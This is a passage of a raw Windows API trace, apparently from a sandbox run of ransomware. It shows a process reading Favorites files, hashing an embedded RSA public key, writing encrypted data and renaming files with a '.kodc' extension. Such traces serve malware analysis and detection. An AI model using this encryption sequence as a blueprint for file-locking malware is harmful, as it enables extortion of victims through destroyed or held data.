nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0101.541] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.541] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.541] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.541] CloseHandle (hObject=0x5cc) returned 1 [0101.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0101.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.542] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.kodc")) returned 1 [0101.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0101.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.543] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b2de0 | out: hHeap=0x630000) returned 1 [0101.544] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0101.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0101.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x32b2de0 [0101.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332da38 | out: hHeap=0x630000) returned 1 [0101.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned=".url" [0101.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.545] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.545] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.549] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.549] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.550] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.550] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.550] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.551] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.551] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.551] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693158) returned 1 [0101.552] CryptCreateHash (in: hProv=0x693158, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.552] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.552] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.552] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.552] GetLastError () returned 0x0 [0101.552] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.552] CryptReleaseContext (hProv=0x693158, dwFlags=0x0) returned 1 [0101.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.552] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.552] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.552] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.552] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ff8 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb6040 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.553] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8058 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb8040 [0101.553] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.554] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.554] GetCurrentThreadId () returned 0x42c [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba8158 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693158 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0101.554] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.555] GetCurrentThreadId () returned 0x42c [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0101.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.555] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8058 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8028 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8070 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.556] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0101.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8040 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8040 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.557] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693158 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8070 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8028 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb6040 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0101.558] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0101.559] WriteFile (in: hFile=0x5cc, lpBuffer=0x65e7c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x65e7c0*, lpNumberOfBytesWritten=0x9e2fb14*=0x80, lpOverlapped=0x0) returned 1 [0101.559] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0101.559] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.559] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.559] HeapFree (in: 